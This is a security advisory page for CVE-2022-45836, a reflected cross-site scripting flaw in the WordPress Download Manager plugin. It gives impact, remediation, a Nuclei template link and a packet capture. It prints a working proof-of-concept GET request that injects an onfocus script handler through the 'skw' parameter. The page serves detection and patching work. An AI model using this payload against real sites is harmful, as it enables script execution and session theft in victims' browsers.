🔙 목록으로 돌아가기

CVE-2022-45836: WordPress Download Manager <= 3.2.59 - Reflected XSS

TitleWordPress Download Manager <= 3.2.59 - Reflected XSS
AuthorShivam Kamboj
SeverityHigh
ImpactAttackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
RemediationUpdate to the latest version of the plugin where the vulnerability is fixed.
Tags cve cve2022 wordpress wp-plugin xss download-manager wpdm wp

🔍 Vulnerability Description

W3 Eden, Inc. Download Manager plugin <= 3.2.59 contains a reflected cross-site scripting caused by insufficient input sanitization, letting attackers execute scripts in the context of the victim’s browser, exploit requires attacker to craft a malicious link.

🌐 HTTP Request

GET /?skw=%22%20onfocus%3D%22alert%28document.domain%29%22%20autofocus%3D%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-45836.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-45836.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A